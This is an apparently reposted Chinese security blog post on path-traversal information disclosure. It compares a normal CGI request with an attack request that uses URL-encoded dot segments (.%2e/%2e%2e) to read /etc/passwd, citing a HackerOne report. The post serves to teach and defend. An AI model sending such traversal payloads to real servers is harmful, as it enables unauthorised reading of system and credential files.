文章总结： 文档分析了路径遍历漏洞导致的信息泄露风险。通过对比正常请求与恶意请求示例，展示了攻击者如何利用URL编码（如.%2e）绕过限制读取/etc/passwd等敏感文件。核心在于服务端未正确处理目录跳转字符，建议开发者严格校验输入路径，防止目录穿越攻击。 综合评分： 72 文章分类： WEB安全,漏洞POC,渗透测试,漏洞分析,SRC活动

通过路径遍历所造成的信息泄露

h1 h1

迪哥讲事

2026年2月4日 11:03 四川

通过路径遍历所造成的信息泄露

正文

1. 正常请求（合法访问）

场景：访问/cgi-bin目录下的合法脚本status.cgi（用于查询服务器状态），HTTP 请求报文如下：

GET /cgi-bin/status.cgi HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: keep-alive

~

特征 ：路径指向合法文件，无特殊编码、无向上遍历的../，服务器返回 200 OK 并展示脚本执行结果。

2. 攻击请求（路径遍历） 场景：攻击者构造 Payload 访问系统敏感文件/etc/passwd（Linux 用户信息文件），HTTP 请求报文如下：

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: */*
Connection: close

~

特征 ：通过 URL 编码的./%2e/（即../）向上遍历目录，目标指向系统级敏感文件；服务器若未拦截，会返回/etc/passwd内容（如用户列表），若拦截则返回 400/403/404 错误。

往期回顾

#

如何利用ai辅助挖漏洞

#

如何在移动端抓包-下

#

如何绕过签名校验

#

一款bp神器

挖掘有回显ssrf的隐藏payload

ssrf绕过新思路

一个辅助测试ssrf的工具

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1948562

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：迪哥讲事 h1 h1《通过路径遍历所造成的信息泄露》